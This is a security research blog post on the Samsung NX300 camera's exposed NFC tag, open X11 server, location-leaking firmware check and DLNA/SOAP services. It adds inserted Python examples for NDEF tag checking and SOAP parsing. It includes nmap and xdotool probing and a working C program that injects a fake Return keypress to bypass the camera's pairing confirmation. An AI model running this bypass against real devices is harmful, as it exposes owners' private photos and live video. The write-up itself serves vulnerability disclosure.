Hacking the Samsung NX300 ‘Smart’ Camera
Georg Lukas, 2014-05-07 18:45
The Samsung NX300 smart camera is a middle-class mirrorless camera with NFC and WiFi connectivity. You can join it to your local WiFi network to upload directly to cloud services, share pictures via DLNA or get remote access from your smartphone. For the latter, the camera provides the Remote Viewfinder and MobileLink modes, where it creates an unencrypted access point with wide-open access to its X server and to any data which you’d expect only to be available to your smartphone.

Because hardware engineers suck at software security, nothing else was to be expected. However, the following will show how badly they suck, if only for documentation purposes.

This post is only covering the network connectivity of the NX300. Read the follow-up posts for getting a root shell and adding features to the camera. The smartphone app deserves some attention as well. Feel free to do your own analysis and post it to the project wiki.

The findings in this blog post are based on firmware version 1.31.
NFC Tag
The NFC “connectivity” is an NTAG203 made by NXP, which is pre-programmed with an NDEF message to download and launch the (horribly designed) Samsung SMART CAMERA App from Google Play, and to tell the app about the access point name provided by this individual camera:
Type: MIME: application/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX
Type: EXTERNAL: urn:nfc:ext:android.com:pkg
Payload: com.samsungimaging.connectionmanager
The tag is writable, so a malicious user can easily “hack” your camera by rewriting its tag to download some evil app, or to open nasty links in your web browser, simply by touching it with an NFC-enabled smartphone. This was confirmed by replacing the tag content with a URL.
The deployed tag supports permanent write-locking, so if a prankster nerd locks it, you may end up with a camera stuck redirecting you to a hardcore porn site.
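To make the tag layout above concrete, here is an added example (not code from the original post) that encodes the two NDEF records, parses them back, and checks a tag dump against the factory layout, so that a rewritten tag (for instance a URI record in place of the MIME record) is flagged. It works on the NDEF message itself, not on the NTAG203’s TLV memory wrapper; the MAC suffix in the SSID is a constructed sample value.

```python
import re
# NDEF header bits and Type Name Format values (NFC Forum NDEF spec)
MB, ME, SR, IL = 0x80, 0x40, 0x10, 0x08   # message begin/end, short record, ID present
TNF_WELL_KNOWN, TNF_MIME, TNF_EXTERNAL = 0x01, 0x02, 0x04
# The two records the post lists; the SSID's MAC suffix is a constructed sample.
NX300_RECORDS = [
    (TNF_MIME, b"application/com.samsungimaging.connectionmanager", b"AP_SSC_NX300_0-AB:CD:EF"),
    (TNF_EXTERNAL, b"android.com:pkg", b"com.samsungimaging.connectionmanager"),
]
SSID_RE = re.compile(rb"^AP_SSC_NX300_0-([0-9A-F]{2}:){2}[0-9A-F]{2}$")

def encode_ndef(records):
    """Serialise (tnf, type, payload) tuples as short NDEF records (lengths < 256)."""
    out = bytearray()
    for i, (tnf, rtype, payload) in enumerate(records):
        if len(rtype) > 255 or len(payload) > 255:
            raise ValueError("short records only")
        flags = SR | tnf | (MB if i == 0 else 0) | (ME if i == len(records) - 1 else 0)
        out += bytes([flags, len(rtype), len(payload)]) + rtype + payload
    return bytes(out)

def decode_ndef(data):
    """Parse short NDEF records back into (tnf, type, payload) tuples."""
    records, pos = [], 0
    while pos < len(data):
        flags, tlen, plen = data[pos], data[pos + 1], data[pos + 2]
        if not flags & SR:
            raise ValueError("long (4-byte payload length) records not handled here")
        pos, ilen = pos + 3, 0
        if flags & IL:                      # optional ID length byte follows
            ilen, pos = data[pos], pos + 1
        rtype, pos = data[pos:pos + tlen], pos + tlen
        pos += ilen                         # skip the record ID, if any
        payload, pos = data[pos:pos + plen], pos + plen
        records.append((flags & 0x07, rtype, payload))
        if flags & ME:                      # last record of the message
            break
    return records

def check_nx300_tag(data):
    """Return findings for a tag dump; an empty list means it matches the factory layout."""
    recs = decode_ndef(data)
    if len(recs) != 2:
        return ["expected 2 records, found %d" % len(recs)]
    findings = []
    (t0, ty0, p0), (t1, ty1, p1) = recs
    if t0 != TNF_MIME or ty0 != NX300_RECORDS[0][1] or not SSID_RE.match(p0):
        findings.append("first record is not the expected MIME/SSID record")
    if (t1, ty1, p1) != NX300_RECORDS[1]:
        findings.append("second record is not the expected android.com:pkg record")
    return findings
```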
WiFi Networking
You can configure the NX300 to join your WiFi network; it will then behave like a regular client with some open services, like DLNA. Let’s see what exactly is offered by performing a port scan:
megavolt:~# nmap -sS -O nx300
Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.local (192.168.0.147)
Host is up (0.0089s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
6000/tcp open  X11
MAC Address: A0:21:95:**:**:** (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
This scan was performed while the “E-Mail” application was open. In AllShare Play and MobileLink modes, 7676/tcp is opened in addition. Further, in Remote Viewfinder mode, the camera also opens 7679/tcp.
X Server
Wait, what? X11 as an open service? Can that be true? Surely it’s access-locked via TCP to prevent abuse?
georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
-misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1
-misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1
-misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
6x13
cursor
fixed
georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
   480x800       60.0*+
HDMI1 disconnected (normal left inverted right x axis y axis)
georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
Defaulting to search window name, class, and classname
Enlightenment Background
acdaemon,key,receiver
Enlightenment Black Zone (0)
Enlightenment Frame
di-camera-app-nx300
Enlightenment Frame
smart-wifi-app-nx300
Nope! This really is an unprotected X server! It’s running Enlightenment! And we can even run apps on it! But besides displaying stuff on the camera, the fun seems very limited:
X11 Key Bindings
A short investigation using xev shows that the physical keys on the camera body are bound to X11 key events as follows:
Key | Keysym |
---|---|
On/Off | XF86PowerOff (only when turning off) |
Scroll Wheel | XF86ScrollUp / XF86ScrollDown |
Direct Link | XF86Mail |
Mode Wheel | F1 .. F10 |
Video Rec | XF86WebCam |
+/- | XF86Reload |
Menu | Menu |
Fn | XF86HomePage |
Keypad | KP_Left .. KP_Down, KP_Enter |
Play | XF86Tools |
Delete | KP_Delete |
WiFi Client: Firmware Update Check
When the camera goes online, it performs a firmware version check. First, it retrieves http://gld.samsungosp.com:
Request:
GET / HTTP/1.1
Content-Type: text/xml;charset=utf-8
Accept: application/x-shockwave-flash, application/vnd.ms-excel, */*
Accept-Language: ko
User-Agent: Mozilla/4.0
Host: gld.samsungosp.com
Response:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content-Length: 7
Connection: keep-alive
200 OK
This really looks like a no-op. But maybe it is a backdoor to allow for remote code execution? Who knows…
Then, a query to http://ipv4.connman.net/online/status.html returns an empty document, but carries your location data (apparently derived from the IP address) in the headers:
X-ConnMan-Status: online
X-ConnMan-Client-IP: ###.###.##.###
X-ConnMan-Client-Address: ###.###.##.###
X-ConnMan-Client-Continent: EU
X-ConnMan-Client-Country: DE
X-ConnMan-Client-Region: ##
X-ConnMan-Client-City: ###### (my actual city)
X-ConnMan-Client-Latitude: ##.166698
X-ConnMan-Client-Longitude: ##.666700
X-ConnMan-Client-Timezone: Europe/Berlin
Wow! They know where I live! At least they don’t transmit any unique identifiers with the query.
As the last step, the camera asks for firmware versions and gets redirected to an XML document with the ChangeLog.
Known versions so far:
WiFi Access Point: UPnP/DLNA
Two of the on-camera apps (MobileLink, Remote Viewfinder) open an unencrypted access point named AP_SSC_NX300_0-XX:XX:XX (where XX:XX:XX is the device part of its MAC address). Fortunately, Samsung’s engineers were smart and added a user confirmation dialog to the camera UI, to prevent remote abuse:
Unfortunately, this dialog is running on a wide-open X server, so all we need is to fake a KP_Return event (based on an example by bharathisubramanian), and we can connect with whichever client, stream a live video or download all the private pictures from the SD card, depending on the enabled mode:
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/keysym.h>
#include <X11/extensions/XTest.h>
#include <stdio.h>
#include <unistd.h>

/* Send Fake Key Event: press (optional modifier +) keysym, then release */
static void SendKey (Display * disp, KeySym keysym, KeySym modsym){
	KeyCode keycode = 0, modcode = 0;
	keycode = XKeysymToKeycode (disp, keysym);
	if (keycode == 0) return;          /* keysym not mapped on this server */
	XTestGrabControl (disp, True);
	/* Generate modkey press */
	if (modsym != 0) {
		modcode = XKeysymToKeycode(disp, modsym);
		XTestFakeKeyEvent (disp, modcode, True, 0);
	}
	/* Generate regular key press and release */
	XTestFakeKeyEvent (disp, keycode, True, 0);
	XTestFakeKeyEvent (disp, keycode, False, 0);
	/* Generate modkey release */
	if (modsym != 0)
		XTestFakeKeyEvent (disp, modcode, False, 0);
	XSync (disp, False);
	XTestGrabControl (disp, False);
}

/* Main Function: connects to $DISPLAY and sends a single Return */
int main (){
	Display *disp = XOpenDisplay (NULL);
	if (disp == NULL) {
		fprintf (stderr, "cannot open display\n");
		return 1;
	}
	sleep (1);
	/* Send Return */
	SendKey (disp, XK_Return, 0);
	XCloseDisplay (disp);
	return 0;
}
DLNA Service: Remote Viewfinder
The DLNA service exposes some camera features, which are queried and used by the Android app. The device’s friendly name is [Camera]NX300, as can be queried via HTTP from http://nx300:7676/smp_2_:
<dlna:X_DLNADOC>DMS-1.50</dlna:X_DLNADOC>
<deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>
<friendlyName>[Camera]NX300</friendlyName>
<manufacturer>Samsung Electronics</manufacturer>
<manufacturerURL>http://www.samsung.com</manufacturerURL>
<modelDescription>Samsung Camera DMS</modelDescription>
<modelName>SP1</modelName>
<modelNumber>1.0</modelNumber>
<modelURL>http://www.samsung.com</modelURL>
<serialNumber>20081113 Folderview</serialNumber>
<sec:X_ProductCap>smi,getMediaInfo.sec,getCaptionInfo.sec</sec:X_ProductCap>
<UDN>uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX</UDN>
<serviceList>
<service>
<serviceType>urn:schemas-upnp-org:service:ContentDirectory:1</serviceType>
<serviceId>urn:upnp-org:serviceId:ContentDirectory</serviceId>
<controlURL>/smp_4_</controlURL>
<eventSubURL>/smp_5_</eventSubURL>
<SCPDURL>/smp_3_</SCPDURL>
</service>
<service>
<serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
<serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>
<controlURL>/smp_7_</controlURL>
<eventSubURL>/smp_8_</eventSubURL>
<SCPDURL>/smp_6_</SCPDURL>
</service>
</serviceList>
<sec:deviceID>
</sec:deviceID>
</device>
More SOAP services are provided for changing settings like focus and flash (/smp_3_):
Function | Arguments | Result |
---|---|---|
GetSystemUpdateID | Id | |
GetSearchCapabilities | SearchCaps | |
GetSortCapabilities | SortCaps | |
Browse | ObjectID BrowseFlag Filter StartingIndex RequestedCount SortCriteria | Result NumberReturned TotalMatches UpdateID |
GetIP | GETIPRESULT | |
GetInfomation | GETINFORMATIONRESULT StreamUrl | |
SetResolution | RESOLUTION | |
ZoomIN | CURRENTZOOM | |
ZoomOUT | CURRENTZOOM | |
MULTIAF | AFSTATUS | |
AF | AFSTATUS | |
setTouchAFOption | TOUCH_AF_OPTION | SET_OPTION_RESULT |
touchAF | AFPOSITION | TOUCHAF_RESULT |
AFRELEASE | AFRELEASERESULT | |
ReleaseSelfTimer | RELEASETIMER | |
Shot | AFSHOTRESULT | |
ShotWithGPS | GPSINFO | AFSHOTRESULT |
SetLED | LEDTIME | |
SetFlash | FLASHMODE | |
SetStreamQuality | Quality | |
Another service is available for picture / video streaming (/smp_4_):
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
<GETINFORMATIONRESULT>
<Resolutions>
<Resolution><Width>5472</Width><Height>3648</Height></Resolution>
<Resolution><Width>1920</Width><Height>1080</Height></Resolution>
</Resolutions>
<Flash>
<Supports><Support>off</Support><Support>auto</Support></Supports>
<Defaultflash>auto</Defaultflash>
</Flash>
<FlashDisplay>
<Supports><Support>off</Support><Support>auto</Support></Supports>
<CurrentFlashDisplay>off</CurrentFlashDisplay>
</FlashDisplay>
<ZoomInfo>
<DefaultZoom>0</DefaultZoom>
<MaxZoom>1</MaxZoom>
</ZoomInfo>
<AVAILSHOTS>289</AVAILSHOTS>
<ROTATION>1</ROTATION>
<StreamQuality>
<Quality><Option>high</Option><Option>low</Option></Quality>
<Default>high</Default>
</StreamQuality>
</GETINFORMATIONRESULT>
<StreamUrl>
<QualityHighUrl>http://192.168.102.1:7679/livestream.avi</QualityHighUrl>
<QualityLowUrl>http://192.168.102.1:7679/qvga_livestream.avi</QualityLowUrl>
</StreamUrl>
</u:GetInfomationResponse>
</s:Body>
</s:Envelope>
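As an added example (not code from the original post), the following parses a GetInfomation response of the shape quoted above into a Python dict, walking the namespaced SOAP wrapper and the un-namespaced payload inside it; the embedded response is a constructed sample modelled on the one above.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
CDS_NS = "urn:schemas-upnp-org:service:ContentDirectory:1"

# Constructed sample shaped like the post's GetInfomation response (abridged).
SAMPLE_RESPONSE = """<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
 s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
<GETINFORMATIONRESULT>
<Resolutions><Resolution><Width>5472</Width><Height>3648</Height></Resolution>
<Resolution><Width>1920</Width><Height>1080</Height></Resolution></Resolutions>
<Flash><Supports><Support>off</Support><Support>auto</Support></Supports>
<Defaultflash>auto</Defaultflash></Flash>
<ZoomInfo><DefaultZoom>0</DefaultZoom><MaxZoom>1</MaxZoom></ZoomInfo>
<AVAILSHOTS>289</AVAILSHOTS>
<StreamQuality><Quality><Option>high</Option><Option>low</Option></Quality>
<Default>high</Default></StreamQuality>
</GETINFORMATIONRESULT>
<StreamUrl><QualityHighUrl>http://192.168.102.1:7679/livestream.avi</QualityHighUrl>
<QualityLowUrl>http://192.168.102.1:7679/qvga_livestream.avi</QualityLowUrl></StreamUrl>
</u:GetInfomationResponse></s:Body></s:Envelope>"""

def parse_get_information(xml_text):
    """Return the camera capabilities and stream URLs from a GetInfomation SOAP response."""
    root = ET.fromstring(xml_text)
    # Envelope/Body and the action response are namespaced; the payload inside is not.
    resp = root.find(f"{{{SOAP_NS}}}Body/{{{CDS_NS}}}GetInfomationResponse")
    if resp is None:
        raise ValueError("not a ContentDirectory GetInfomationResponse")
    info = resp.find("GETINFORMATIONRESULT")
    urls = resp.find("StreamUrl")
    return {
        "resolutions": [(int(r.findtext("Width")), int(r.findtext("Height")))
                        for r in info.findall("Resolutions/Resolution")],
        "flash_modes": [s.text for s in info.findall("Flash/Supports/Support")],
        "default_flash": info.findtext("Flash/Defaultflash"),
        "max_zoom": int(info.findtext("ZoomInfo/MaxZoom")),
        "available_shots": int(info.findtext("AVAILSHOTS")),
        "stream_qualities": [o.text for o in info.findall("StreamQuality/Quality/Option")],
        "streams": {u.tag: u.text for u in urls} if urls is not None else {},
    }
```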
After triggering the appropriate commands, a live video stream should be available from http://nx300:7679/livestream.avi. However, a quick attempt to get some video with wget or mplayer failed.
The “source code” package provided on Samsung’s OSS Release Center is 834 MBytes compressed and mainly contains three copies of the rootfs image (400-500MB each), plus some scripts. The actual build root is hidden behind the second paper-sheet link in the “Announcements” column.
Also, there are Obamapics in TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO.
The project is built on an ancient version of Tizen, on which I’m no expert. Somebody else needs to take this stuff apart, make a proper build environment, or port OpenWRT to it.
Full series: